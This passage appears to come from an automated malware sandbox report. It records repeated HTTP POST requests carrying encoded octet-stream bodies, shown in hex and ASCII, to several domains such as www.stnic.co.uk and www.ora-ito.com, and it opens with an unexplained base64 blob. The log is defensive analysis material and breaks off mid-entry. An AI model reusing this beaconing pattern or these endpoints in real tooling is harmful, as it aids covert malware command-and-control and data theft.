S7qp5nwf65hbMEm9J/QGwg+A+MAUSj3AcKgrr77Lozmh7vCN5eahoNAaCQui8vLRrIwjgHZ0tOnLm2CSDI7mX74Bz3VNq/SBQG9E5udhAcBreZNShpTLkc6bThHU15+stO9m0e17FmovhipPYnLns1xRFLmsdcHxKO/tf4IQp7Aed36VPg0lVRgwkrigMOuoMkfyYJx1cV506OQc/pb4OzkpuUEUNeooLNxTwFrcNEitPSZHxbkzL4umI0opy7BadfQHPnAh3anXBVJ5E5b3OIwvbmPiWg8MXtPKRg+q5FjhHCyAHuf5yMpHnC7CXJC/FoUak2L3u4eOlhEElKLQJIgdM9lKLnIX09qiwzhe+d9waTCo9OQYb/I2F/NHQfybQDS3776uvX7OfSPZxfn13GheAii18ixVL1W13XkVVzg1fOaTqYPBEo953Zanh3BKcs7FdoRnBb/Zmck2IyfCOMzZSNJYLxSvzkY53z5ZBDjRQlmA6fcndw4O9jZqtI7npNDR2fI2DpGR+vPesCT4vWCOttfJpJpJHQ==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.holleman.usCache-Control: no-cacheData Raw: 69 4e 6f 59 6e 4a 4b 7a 36 4a 67 78 6d 4e 78 34 52 54 30 4f 51 5a 55 75 5a 7a 2f 69 52 75 50 71 35 6d 4c 52 51 76 72 75 61 4b 61 58 56 70 2f 44 45 78 39 47 4a 65 78 6d 44 43 48 68 4b 31 58 54 70 30 7a 63 47 52 53 31 59 68 4a 55 49 51 55 44 4f 70 56 76 57 69 54 43 2f 62 50 45 48 7a 59 75 6d 62 34 64 66 6b 31 41 32 2b 75 6b 6e 33 55 4a 68 59 6d 61 4a 70 7a 32 32 48 43 31 6c 38 39 4d 4a 54 42 47 69 52 4b 45 48 6c 38 77 46 4b 44 55 54 66 78 43 37 30 70 52 51 38 78 37 7a 58 4f 55 47 35 54 59 77 38 33 47 69 50 34 2b 64 58 55 6c 41 34 75 42 30 35 69 31 53 4e 46 4e 71 41 6c 34 4d 4e 57 58 65 52 6b 57 76 43 58 75 58 7a 6a 50 72 6b 5a 55 79 33 50 38 46 30 4b 6b 38 44 6d 65 62 4f 72 72 71 76 72 4f 49 51 58 32 50 41 78 69 76 45 63 79 61 76 61 31 4d 37 55 7a 41 36 35 59 44 59 65 7a 39 31 2b 77 47 43 51 76 7a 75 35 77 4a 6a 74 5a 76 41 57 44 36 68 74 4f 34 76 57 77 4b 44 4b 70 74 4e 52 37 56 70 33 67 79 42 4e 4a 41 62 74 73 57 4e 33 50 47 72 67 62 48 7a 58 65 62 73 4c 4a 59 71 39 68 38 6c 53 34 52 7a 76 37 4c 79 77 6a 78 2b 4c 53 79 66 4f 42 58 43 50 5a 6f 36 59 34 69 49 66 33 63 78 2b 31 38 6d 61 67 47 4c 2b 74 2b 72 33 48 4b 6f 44 39 45 6d 31 4f 49 42 31 6b 6f 6c 7a 76 44 72 73 39 61 4d 6d 79 79 32 35 32 4a 38 32 65 44 77 59 39 4f 66 70 72 36 68 74 68 6e 4f 55 61 4b 71 34 30 52 61 47 55 74 62 73 4d 50 54 35 6a 4d 43 32 45 52 43 2f 36 7a 69 54 43 6a 73 77 41 72 76 4f 59 30 2b 57 32 42 6e 41 48 47 70 77 72 33 70 63 36 7a 32 34 76 35 58 65 33 33 33 39 70 4a 53 2f 79 30 58 68 52 7a 42 57 76 54 74 70 59 49 79 67 34 4c 54 34 79 68 6c 44 37 6a 46 38 71 4c 5a 48 74 6f 30 38 7a 75 76 6f 61 63 59 7a 2f 53 4f 45 74 6b 70 37 6b 32 5a 52 68 Data Ascii: iNoYnJKz6JgxmNx4RT0OQZUuZz/iRuPq5mLRQvruaKaXVp/DEx9GJexmDCHhK1XTp0zcGRS1YhJUIQUDOpVvWiTC/bPEHzYumb4dfk1A2+ukn3UJhYmaJpz22HC1l89MJTBGiRKEHl8wFKDUTfxC70pRQ8x7zXOUG5TYw83GiP4+dXUlA4uB05i1SNFNqAl4MNWXeRkWvCXuXzjPrkZUy3P8F0Kk8DmebOrrqvrOIQX2PAxivEcyava1M7UzA65YDYez91+wGCQvzu5wJjtZvAWD6htO4vWwKDKptNR7Vp3gyBNJAbtsWN3PGrgbHzXebsLJYq9h8lS4Rzv7Lywjx+LSyfOBXCPZo6Y4iIf3cx+18magGL+t+r3HKoD9Em1OIB1kolzvDrs9aMmyy252J82eDwY9Ofpr6hthnOUaKq40RaGUtbsMPT5jMC2ERC/6ziTCjswArvOY0+W2BnAHGpwr3pc6z24v5Xe3339pJS/y0XhRzBWvTtpYIyg4LT4yhlD7jF8qLZHto08zuvoacYz/SOEtkp7k2ZRh
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.speelhal.netCache-Control: no-cacheData Raw: 35 6e 63 67 2f 43 73 69 39 4a 6a 4d 6a 49 45 62 41 74 47 6b 6e 4a 51 70 4b 6c 50 78 37 33 32 45 6a 39 35 6f 51 57 77 55 55 6c 55 55 37 49 64 5a 51 74 33 37 4a 39 34 39 67 6b 55 59 72 4e 52 63 50 48 46 69 36 4f 66 63 5a 2f 6b 34 4a 41 6d 6b 36 50 65 51 66 42 57 78 55 64 45 76 73 6e 2f 76 6e 6e 45 66 64 75 77 37 4d 47 61 45 74 39 61 62 50 53 6d 4c 31 72 62 62 2f 45 41 69 64 79 33 64 45 54 42 5a 79 67 32 6b 4f 2f 39 61 4a 6c 71 30 47 7a 58 65 2f 66 56 77 34 66 6f 6d 47 47 4f 4b 47 45 62 6b 4d 6b 44 36 35 6e 6c 67 6e 52 78 64 46 79 43 6a 77 51 61 6e 64 47 50 6c 58 6a 33 74 36 30 56 49 70 65 69 42 56 68 62 72 41 63 72 35 56 34 72 71 42 4b 36 4f 31 32 4b 32 35 5a 4e 76 6b 74 79 77 30 7a 68 6c 77 47 6b 57 52 55 36 31 52 48 31 6f 66 43 4d 56 77 31 66 4a 54 2f 57 37 52 4a 69 52 59 6c 39 31 35 50 41 41 57 44 48 78 31 4b 51 62 33 67 55 55 41 6d 64 34 58 5a 66 44 37 7a 47 33 54 7a 48 4b 54 4b 33 39 71 64 39 73 6a 78 33 4b 34 71 65 4d 70 30 46 52 6f 32 57 5a 72 31 57 75 63 34 6e 6a 4b 5a 32 76 4d 72 6a 44 58 43 77 57 68 39 31 54 68 48 4f 58 68 43 6f 67 33 41 62 36 6f 6f 76 34 46 47 41 49 2f 78 59 43 45 64 57 51 58 45 6d 69 56 6a 66 52 33 49 2f 71 73 39 6c 4f 56 58 58 6a 4b 6f 43 62 52 32 51 46 73 43 62 74 6f 42 45 31 75 65 44 73 58 66 38 77 50 57 38 59 75 62 61 47 65 67 6c 64 66 72 48 32 67 35 4a 35 38 54 6e 4c 55 4c 6c 77 2f 44 64 4c 5a 53 49 54 47 46 44 6d 75 51 39 79 46 73 68 78 67 51 4a 6c 31 53 43 6f 2f 64 61 71 35 63 61 65 67 6f 68 66 74 31 51 68 6f 6b 67 69 48 67 75 51 69 49 43 39 33 4f 54 55 79 42 32 77 6c 37 67 64 6b 62 41 49 43 46 79 32 49 6d 6b 52 76 50 2b 2b 2f 48 44 6d 46 49 31 4c 67 52 31 4d 71 4f 61 71 5a 43 52 2b 45 64 32 43 30 6d 73 41 63 6a 57 38 57 62 42 62 7a 6c 67 6b 57 4e 72 57 41 52 76 59 56 43 46 74 6f 67 4e 79 Data Ascii: 5ncg/Csi9JjMjIEbAtGknJQpKlPx732Ej95oQWwUUlUU7IdZQt37J949gkUYrNRcPHFi6OfcZ/k4JAmk6PeQfBWxUdEvsn/vnnEfduw7MGaEt9abPSmL1rbb/EAidy3dETBZyg2kO/9aJlq0GzXe/fVw4fomGGOKGEbkMkD65nlgnRxdFyCjwQandGPlXj3t60VIpeiBVhbrAcr5V4rqBK6O12K25ZNvktyw0zhlwGkWRU61RH1ofCMVw1fJT/W7RJiRYl915PAAWDHx1KQb3gUUAmd4XZfD7zG3TzHKTK39qd9sjx3K4qeMp0FRo2WZr1Wuc4njKZ2vMrjDXCwWh91ThHOXhCog3Ab6oov4FGAI/xYCEdWQXEmiVjfR3I/qs9lOVXXjKoCbR2QFsCbtoBE1ueDsXf8wPW8YubaGegldfrH2g5J58TnLULlw/DdLZSITGFDmuQ9yFshxgQJl1SCo/daq5caegohft1QhokgiHguQiIC93OTUyB2wl7gdkbAICFy2ImkRvP++/HDmFI1LgR1MqOaqZCR+Ed2C0msAcjW8WbBbzlgkWNrWARvYVCFtogNy
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 53 6d 5a 38 2b 39 55 63 39 4a 67 65 4b 79 4e 37 76 45 67 65 46 63 36 2f 61 32 7a 6a 65 4c 38 30 32 58 37 75 73 44 48 4c 42 37 6f 71 72 4d 6f 63 70 51 6a 6f 36 34 31 52 4c 39 42 66 41 6e 44 4d 52 6d 5a 78 38 48 54 4f 49 68 4f 39 66 50 4b 37 6f 30 43 63 59 77 69 55 73 52 71 59 52 4f 55 74 45 64 4b 2f 50 75 76 6c 59 52 35 76 2b 49 74 4b 34 4d 49 43 4e 69 66 53 36 35 57 64 75 71 6b 75 6d 6f 52 43 4e 32 74 68 78 48 48 49 2f 73 73 4e 44 56 58 77 36 4e 45 33 66 63 70 76 45 78 44 79 35 65 56 32 76 79 44 6e 79 52 53 4d 72 77 73 67 30 35 61 46 62 4d 2f 6d 65 4a 41 42 63 62 4d 2f 53 5a 59 73 48 4b 69 6e 31 73 71 6a 58 2f 79 2f 46 72 41 6a 4f 43 31 6d 6f 61 6f 4a 6d 77 45 6f 30 53 78 2f 55 36 36 4b 49 53 75 4c 46 42 52 6a 76 6e 4b 36 4f 6a 78 51 39 79 67 32 4f 38 2f 62 56 61 4f 76 67 65 64 4b 63 79 41 6b 78 39 78 76 62 53 44 64 50 44 6b 45 70 5a 35 42 37 48 47 6c 44 70 2f 49 6a 4d 58 2f 4b 47 47 59 42 4a 54 70 65 52 32 58 51 46 45 73 4e 6f 67 4d 73 42 4b 57 7a 37 65 5a 44 4f 45 33 51 79 5a 65 6f 4f 47 70 69 64 6a 42 37 36 2f 6f 59 4e 55 74 63 4d 32 6e 52 73 6a 54 4e 39 45 77 57 69 77 4e 6a 76 51 6b 78 65 4c 4b 43 6c 6b 7a 35 4a 6f 59 78 72 6f 47 57 6a 2b 6f 31 56 46 50 62 50 62 48 4f 70 4e 61 63 39 4b 4b 48 4a 55 46 42 38 4a 55 53 54 6f 2b 53 5a 4b 6a 72 32 49 77 78 51 68 70 76 48 41 56 62 4c 65 74 34 2f 2f 47 65 6c 51 6b 35 65 56 69 50 52 44 37 44 2f 59 49 61 64 35 31 6f 68 70 6e 4e 6f 76 79 6f 72 42 72 59 43 4e 6e 61 4f 2b 57 4d 30 35 78 76 36 48 2f 64 6f 4c 72 6e 52 5a 66 65 36 4a 51 57 6e 78 33 51 75 37 75 46 66 62 47 56 6a 7a 72 44 67 37 65 48 39 2f 79 79 41 46 58 73 65 32 2f 64 4d 4b 74 63 57 52 65 65 37 45 59 2f 4e 41 43 6a 51 3d 3d Data Ascii: SmZ8+9Uc9JgeKyN7vEgeFc6/a2zjeL802X7usDHLB7oqrMocpQjo641RL9BfAnDMRmZx8HTOIhO9fPK7o0CcYwiUsRqYROUtEdK/PuvlYR5v+ItK4MICNifS65WduqkumoRCN2thxHHI/ssNDVXw6NE3fcpvExDy5eV2vyDnyRSMrwsg05aFbM/meJABcbM/SZYsHKin1sqjX/y/FrAjOC1moaoJmwEo0Sx/U66KISuLFBRjvnK6OjxQ9yg2O8/bVaOvgedKcyAkx9xvbSDdPDkEpZ5B7HGlDp/IjMX/KGGYBJTpeR2XQFEsNogMsBKWz7eZDOE3QyZeoOGpidjB76/oYNUtcM2nRsjTN9EwWiwNjvQkxeLKClkz5JoYxroGWj+o1VFPbPbHOpNac9KKHJUFB8JUSTo+SZKjr2IwxQhpvHAVbLet4//GelQk5eViPRD7D/YIad51ohpnNovyorBrYCNnaO+WM05xv6H/doLrnRZfe6JQWnx3Qu7uFfbGVjzrDg7eH9/yyAFXse2/dMKtcWRee7EY/NACjQ==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jacomfg.comCache-Control: no-cacheData Raw: 4b 6c 43 56 47 44 68 75 35 4a 69 4e 67 70 52 2f 75 39 78 71 78 79 73 4f 2b 58 47 41 4a 51 64 78 37 4f 78 49 64 4c 54 30 75 62 63 35 4d 67 77 41 4d 31 63 59 67 66 43 53 59 6d 6a 57 78 51 4b 33 43 66 74 64 4e 32 76 71 56 58 67 6d 6d 6b 68 34 77 79 55 32 6c 63 76 44 69 45 34 72 72 41 30 4d 6c 4a 4d 69 52 32 4b 44 48 36 36 62 64 4e 6a 73 39 5a 34 57 4f 56 4b 4b 62 42 47 4e 56 6e 4c 38 63 2b 57 35 45 37 42 73 71 77 50 61 55 4e 45 32 34 6d 52 31 50 45 5a 47 55 4c 41 54 5a 2f 73 66 30 71 69 53 4c 67 6f 4e 66 66 78 32 68 38 4c 6d 65 34 56 53 77 58 43 36 47 35 56 61 6f 46 38 43 4a 36 31 31 35 35 68 42 76 63 6f 2f 51 6a 74 56 2b 73 5a 75 33 41 36 4c 2f 44 2f 4d 39 57 31 63 74 69 47 52 61 48 61 6c 49 39 47 67 75 52 68 4f 78 6c 57 51 4b 50 37 64 58 49 4e 78 50 51 77 46 47 36 4c 36 70 36 71 41 47 47 59 30 6f 37 52 66 6f 36 57 71 64 6c 4f 6d 41 62 58 5a 56 70 54 41 57 5a 70 70 5a 59 53 48 72 47 32 75 78 59 62 32 76 46 31 74 49 78 70 57 50 37 68 6a 63 74 36 63 55 62 63 55 37 67 67 54 6f 2b 4d 58 69 65 70 75 66 56 34 41 49 48 4e 56 56 38 45 56 45 38 72 70 2f 4b 4e 78 39 56 74 72 75 58 72 59 38 58 78 2b 32 74 4a 51 64 67 67 6f 2b 4f 64 45 4f 54 64 57 31 4f 57 67 36 4c 4a 56 57 53 78 79 6f 57 70 4e 76 72 4f 39 50 68 65 51 4b 38 33 75 6a 78 50 68 65 38 58 75 68 7a 70 30 52 6d 39 6d 72 41 57 52 6b 43 68 4c 70 48 53 4d 32 63 65 6f 43 76 68 46 5a 59 76 5a 2b 75 6b 74 36 45 6c 2f 30 47 68 76 4d 49 46 56 59 78 39 7a 67 55 41 34 64 66 4e 4b 77 54 4f 4a 44 61 4c 58 31 45 36 4c 51 59 34 4d 6a 77 67 4d 6d 38 37 61 78 32 78 59 76 67 36 48 47 47 6f 6b 37 33 55 50 56 51 6a 35 65 47 32 34 76 53 75 72 4d 30 72 79 74 31 68 34 45 70 77 46 59 32 4c 43 35 35 52 4c 36 70 71 76 44 74 47 39 49 78 4c 31 41 58 79 70 41 75 56 73 4d 58 4b 73 76 6d 33 2f 76 35 4b 44 46 74 33 6e Data Ascii: KlCVGDhu5JiNgpR/u9xqxysO+XGAJQdx7OxIdLT0ubc5MgwAM1cYgfCSYmjWxQK3CftdN2vqVXgmmkh4wyU2lcvDiE4rrA0MlJMiR2KDH66bdNjs9Z4WOVKKbBGNVnL8c+W5E7BsqwPaUNE24mR1PEZGULATZ/sf0qiSLgoNffx2h8Lme4VSwXC6G5VaoF8CJ61155hBvco/QjtV+sZu3A6L/D/M9W1ctiGRaHalI9GguRhOxlWQKP7dXINxPQwFG6L6p6qAGGY0o7Rfo6WqdlOmAbXZVpTAWZppZYSHrG2uxYb2vF1tIxpWP7hjct6cUbcU7ggTo+MXiepufV4AIHNVV8EVE8rp/KNx9VtruXrY8Xx+2tJQdggo+OdEOTdW1OWg6LJVWSxyoWpNvrO9PheQK83ujxPhe8Xuhzp0Rm9mrAWRkChLpHSM2ceoCvhFZYvZ+ukt6El/0GhvMIFVYx9zgUA4dfNKwTOJDaLX1E6LQY4MjwgMm87ax2xYvg6HGGok73UPVQj5eG24vSurM0ryt1h4EpwFY2LC55RL6pqvDtG9IxL1AXypAuVsMXKsvm3/v5KDFt3n
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 53 6d 5a 38 2b 39 55 63 39 4a 67 65 4b 79 4e 37 76 45 67 65 46 63 36 2f 61 32 7a 6a 65 4c 38 30 32 58 37 75 73 44 48 4c 42 37 6f 71 72 4d 6f 63 70 51 6a 6f 36 34 31 52 4c 39 42 66 41 6e 44 4d 52 6d 5a 78 38 48 54 4f 49 68 4f 39 66 50 4b 37 6f 30 43 63 59 77 69 55 73 52 71 59 52 4f 55 74 45 64 4b 2f 50 75 76 6c 59 52 35 76 2b 49 74 4b 34 4d 49 43 4e 69 66 53 36 35 57 64 75 71 6b 75 6d 6f 52 43 4e 32 74 68 78 48 48 49 2f 73 73 4e 44 56 58 77 36 4e 45 33 66 63 70 76 45 78 44 79 35 65 56 32 76 79 44 6e 79 52 53 4d 72 77 73 67 30 35 61 46 62 4d 2f 6d 65 4a 41 42 63 62 4d 2f 53 5a 59 73 48 4b 69 6e 31 73 71 6a 58 2f 79 2f 46 72 41 6a 4f 43 31 6d 6f 61 6f 4a 6d 77 45 6f 30 53 78 2f 55 36 36 4b 49 53 75 4c 46 42 52 6a 76 6e 4b 36 4f 6a 78 51 39 79 67 32 4f 38 2f 62 56 61 4f 76 67 65 64 4b 63 79 41 6b 78 39 78 76 62 53 44 64 50 44 6b 45 70 5a 35 42 37 48 47 6c 44 70 2f 49 6a 4d 58 2f 4b 47 47 59 42 4a 54 70 65 52 32 58 51 46 45 73 4e 6f 67 4d 73 42 4b 57 7a 37 65 5a 44 4f 45 33 51 79 5a 65 6f 4f 47 70 69 64 6a 42 37 36 2f 6f 59 4e 55 74 63 4d 32 6e 52 73 6a 54 4e 39 45 77 57 69 77 4e 6a 76 51 6b 78 65 4c 4b 43 6c 6b 7a 35 4a 6f 59 78 72 6f 47 57 6a 2b 6f 31 56 46 50 62 50 62 48 4f 70 4e 61 63 39 4b 4b 48 4a 55 46 42 38 4a 55 53 54 6f 2b 53 5a 4b 6a 72 32 49 77 78 51 68 70 76 48 41 56 62 4c 65 74 34 2f 2f 47 65 6c 51 6b 35 65 56 69 50 52 44 37 44 2f 59 49 61 64 35 31 6f 68 70 6e 4e 6f 76 79 6f 72 42 72 59 43 4e 6e 61 4f 2b 57 4d 30 35 78 76 36 48 2f 64 6f 4c 72 6e 52 5a 66 65 36 4a 51 57 6e 78 33 51 75 37 75 46 66 62 47 56 6a 7a 72 44 67 37 65 48 39 2f 79 79 41 46 58 73 65 32 2f 64 4d 4b 74 63 57 52 65 65 37 45 59 2f 4e 41 43 6a 51 3d 3d Data Ascii: SmZ8+9Uc9JgeKyN7vEgeFc6/a2zjeL802X7usDHLB7oqrMocpQjo641RL9BfAnDMRmZx8HTOIhO9fPK7o0CcYwiUsRqYROUtEdK/PuvlYR5v+ItK4MICNifS65WduqkumoRCN2thxHHI/ssNDVXw6NE3fcpvExDy5eV2vyDnyRSMrwsg05aFbM/meJABcbM/SZYsHKin1sqjX/y/FrAjOC1moaoJmwEo0Sx/U66KISuLFBRjvnK6OjxQ9yg2O8/bVaOvgedKcyAkx9xvbSDdPDkEpZ5B7HGlDp/IjMX/KGGYBJTpeR2XQFEsNogMsBKWz7eZDOE3QyZeoOGpidjB76/oYNUtcM2nRsjTN9EwWiwNjvQkxeLKClkz5JoYxroGWj+o1VFPbPbHOpNac9KKHJUFB8JUSTo+SZKjr2IwxQhpvHAVbLet4//GelQk5eViPRD7D/YIad51ohpnNovyorBrYCNnaO+WM05xv6H/doLrnRZfe6JQWnx3Qu7uFfbGVjzrDg7eH9/yyAFXse2/dMKtcWRee7EY/NACjQ==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.findbc.comCache-Control: no-cacheData Raw: 70 52 2b 43 6a 51 59 72 41 5a 6b 45 52 51 6f 6c 49 59 59 34 72 43 6d 36 32 36 64 6d 56 64 39 4a 6d 72 39 4c 37 72 70 58 7a 33 4e 63 42 72 50 4c 67 51 4d 4f 30 48 6c 70 33 32 38 67 35 53 4d 75 44 4e 4c 7a 78 58 30 57 71 34 35 2f 6e 68 55 64 49 47 50 66 48 53 66 56 72 37 67 4a 69 51 76 6f 78 68 34 78 6d 48 35 51 4f 52 4d 55 36 70 48 69 59 55 4d 63 73 61 70 38 4a 4f 4c 4f 41 74 68 54 2f 6b 44 71 53 71 71 7a 63 49 53 69 2b 54 42 71 64 4a 6b 45 57 35 51 66 75 48 4b 4a 79 57 34 47 76 78 6a 58 31 38 67 48 37 67 31 66 44 58 69 48 31 63 64 74 47 4d 71 33 49 78 67 72 4e 44 41 55 69 43 2b 75 73 59 78 31 54 79 4c 6f 63 76 31 36 6e 51 66 70 51 59 78 5a 77 37 78 6c 71 31 77 53 77 4a 6b 57 4b 4c 34 45 34 6d 61 4b 65 78 46 71 6c 6c 58 38 72 37 4f 58 4d 6f 6c 33 42 30 31 52 6c 71 4f 64 75 2f 36 39 64 45 6c 4e 55 63 61 4c 45 6f 32 6b 58 4f 56 7a 4d 58 50 33 7a 4f 6e 59 76 6a 56 53 76 44 43 63 77 71 2b 4e 45 4a 71 47 63 54 44 76 71 69 6f 46 74 7a 51 76 61 63 54 74 58 31 6a 78 34 66 74 51 2f 63 38 68 4e 65 55 6c 54 7a 75 76 44 59 62 6b 56 2f 64 48 79 6a 4f 2f 4b 68 45 6e 57 6c 42 4c 6e 6b 69 32 65 46 6b 57 33 2b 51 47 59 46 57 4f 34 55 71 42 44 76 70 30 63 69 2f 73 30 77 58 41 73 70 57 47 44 49 74 4f 78 35 68 32 5a 56 4b 5a 79 4c 72 33 64 54 68 36 58 50 49 53 4e 64 36 55 6f 5a 54 42 6c 55 72 33 61 6a 59 50 5a 31 42 79 67 67 37 52 4f 6b 68 49 4d 52 6b 49 51 53 47 58 7a 64 6a 6c 39 44 77 72 62 2f 47 32 4c 6e 74 6d 6e 46 79 63 70 7a 42 7a 42 44 54 76 30 55 59 61 6f 6e 2f 41 76 48 71 6d 69 65 6a 75 37 57 74 68 79 53 57 6f 79 49 6e 35 75 4b 4c 47 63 63 73 6b 79 71 70 49 34 35 68 42 77 7a 36 57 30 57 47 49 5a 4b 77 73 2b 47 4a 64 59 54 5a 79 62 47 77 32 59 52 53 4f 42 4d 38 4f 65 35 52 76 37 76 43 49 58 41 56 61 36 43 37 50 57 6f 4c 63 7a 55 31 4f Data Ascii: pR+CjQYrAZkERQolIYY4rCm626dmVd9Jmr9L7rpXz3NcBrPLgQMO0Hlp328g5SMuDNLzxX0Wq45/nhUdIGPfHSfVr7gJiQvoxh4xmH5QORMU6pHiYUMcsap8JOLOAthT/kDqSqqzcISi+TBqdJkEW5QfuHKJyW4GvxjX18gH7g1fDXiH1cdtGMq3IxgrNDAUiC+usYx1TyLocv16nQfpQYxZw7xlq1wSwJkWKL4E4maKexFqllX8r7OXMol3B01RlqOdu/69dElNUcaLEo2kXOVzMXP3zOnYvjVSvDCcwq+NEJqGcTDvqioFtzQvacTtX1jx4ftQ/c8hNeUlTzuvDYbkV/dHyjO/KhEnWlBLnki2eFkW3+QGYFWO4UqBDvp0ci/s0wXAspWGDItOx5h2ZVKZyLr3dTh6XPISNd6UoZTBlUr3ajYPZ1Bygg7ROkhIMRkIQSGXzdjl9Dwrb/G2LntmnFycpzBzBDTv0UYaon/AvHqmieju7WthySWoyIn5uKLGccskyqpI45hBwz6W0WGIZKws+GJdYTZybGw2YRSOBM8Oe5Rv7vCIXAVa6C7PWoLczU1O
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora-ito.comCache-Control: no-cacheData Raw: 47 4f 30 42 6c 77 4e 36 41 5a 6b 6f 50 2b 2b 70 43 6c 64 71 67 69 7a 4c 79 73 61 70 63 45 6a 47 35 34 64 54 63 48 63 69 34 64 72 4d 5a 78 71 5a 4c 68 4c 64 47 56 59 43 52 52 38 64 63 69 73 75 56 4c 4c 54 34 64 38 73 75 50 48 55 44 38 69 63 76 6a 59 30 71 6f 52 58 66 42 5a 30 67 5a 33 35 39 67 58 4a 56 59 39 77 4c 69 44 77 59 53 2f 76 48 4b 68 43 6e 5a 73 37 5a 6f 4b 72 70 59 55 63 68 49 6c 6a 32 4c 4d 38 6c 4b 7a 66 32 4f 57 4c 64 58 6f 4e 69 42 36 74 2b 4b 69 59 52 66 4b 68 30 74 6d 69 78 55 79 53 65 69 49 34 56 67 56 76 4e 62 59 4d 30 61 6d 65 72 66 5a 2b 78 65 7a 56 74 69 44 2f 79 65 59 55 73 52 63 61 7a 35 59 36 35 4c 52 6c 69 62 34 75 66 69 65 35 58 6b 56 52 66 4e 32 33 31 2f 54 34 62 68 68 45 38 44 6b 43 62 37 73 42 48 33 62 68 46 44 39 52 58 47 5a 6e 39 33 70 38 76 6a 6a 70 4b 77 58 43 4d 46 50 38 34 6b 56 35 6e 6d 33 62 69 53 72 34 4d 6a 4c 41 6c 2f 78 43 30 58 33 53 34 66 37 2b 52 69 52 68 72 71 4c 32 6e 76 4e 69 6c 4d 54 77 4c 6e 32 33 36 39 6f 34 78 62 75 6d 74 72 2b 77 4e 37 7a 68 56 33 68 6f 57 72 4e 35 55 55 63 55 34 78 66 6f 70 69 69 55 71 44 57 2f 57 6d 63 4b 4b 62 67 4c 48 33 46 64 58 36 64 34 62 37 2f 38 6e 56 6c 56 46 71 61 42 6a 58 6d 4d 79 4d 6c 4c 68 69 4c 38 64 76 77 6f 5a 46 57 52 51 56 79 69 37 53 51 61 70 78 30 6d 64 30 4b 76 38 6d 73 4b 75 6f 73 6e 52 37 67 65 68 54 41 42 37 34 34 51 55 67 67 70 4b 58 54 31 4e 6b 64 51 2b 69 72 43 55 4f 6b 4c 68 75 61 78 46 32 54 56 42 4e 47 44 4c 54 4f 36 5a 74 6c 67 35 4f 75 58 56 39 36 5a 72 52 57 53 58 67 70 46 59 4f 59 7a 38 37 30 51 42 6b 4a 59 67 79 4d 56 2b 6e 45 45 2b 34 75 47 4f 6e 38 4f 6a 45 55 41 71 67 37 76 49 67 61 68 77 47 46 2b 38 64 54 39 68 67 69 46 45 35 4f 50 31 63 39 50 31 38 74 64 59 6f 4d 7a 39 66 62 45 70 70 6c 79 38 30 50 5a 54 67 3d 3d Data Ascii: GO0BlwN6AZkoP++pCldqgizLysapcEjG54dTcHci4drMZxqZLhLdGVYCRR8dcisuVLLT4d8suPHUD8icvjY0qoRXfBZ0gZ359gXJVY9wLiDwYS/vHKhCnZs7ZoKrpYUchIlj2LM8lKzf2OWLdXoNiB6t+KiYRfKh0tmixUySeiI4VgVvNbYM0amerfZ+xezVtiD/yeYUsRcaz5Y65LRlib4ufie5XkVRfN231/T4bhhE8DkCb7sBH3bhFD9RXGZn93p8vjjpKwXCMFP84kV5nm3biSr4MjLAl/xC0X3S4f7+RiRhrqL2nvNilMTwLn2369o4xbumtr+wN7zhV3hoWrN5UUcU4xfopiiUqDW/WmcKKbgLH3FdX6d4b7/8nVlVFqaBjXmMyMlLhiL8dvwoZFWRQVyi7SQapx0md0Kv8msKuosnR7gehTAB744QUggpKXT1NkdQ+irCUOkLhuaxF2TVBNGDLTO6Ztlg5OuXV96ZrRWSXgpFYOYz870QBkJYgyMV+nEE+4uGOn8OjEUAqg7vIgahwGF+8dT9hgiFE5OP1c9P18tdYoMz9fbEpply80PZTg==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora-ito.comCache-Control: no-cacheData Raw: 47 4f 30 42 6c 77 4e 36 41 5a 6b 6f 50 2b 2b 70 43 6c 64 71 67 69 7a 4c 79 73 61 70 63 45 6a 47 35 34 64 54 63 48 63 69 34 64 72 4d 5a 78 71 5a 4c 68 4c 64 47 56 59 43 52 52 38 64 63 69 73 75 56 4c 4c 54 34 64 38 73 75 50 48 55 44 38 69 63 76 6a 59 30 71 6f 52 58 66 42 5a 30 67 5a 33 35 39 67 58 4a 56 59 39 77 4c 69 44 77 59 53 2f 76 48 4b 68 43 6e 5a 73 37 5a 6f 4b 72 70 59 55 63 68 49 6c 6a 32 4c 4d 38 6c 4b 7a 66 32 4f 57 4c 64 58 6f 4e 69 42 36 74 2b 4b 69 59 52 66 4b 68 30 74 6d 69 78 55 79 53 65 69 49 34 56 67 56 76 4e 62 59 4d 30 61 6d 65 72 66 5a 2b 78 65 7a 56 74 69 44 2f 79 65 59 55 73 52 63 61 7a 35 59 36 35 4c 52 6c 69 62 34 75 66 69 65 35 58 6b 56 52 66 4e 32 33 31 2f 54 34 62 68 68 45 38 44 6b 43 62 37 73 42 48 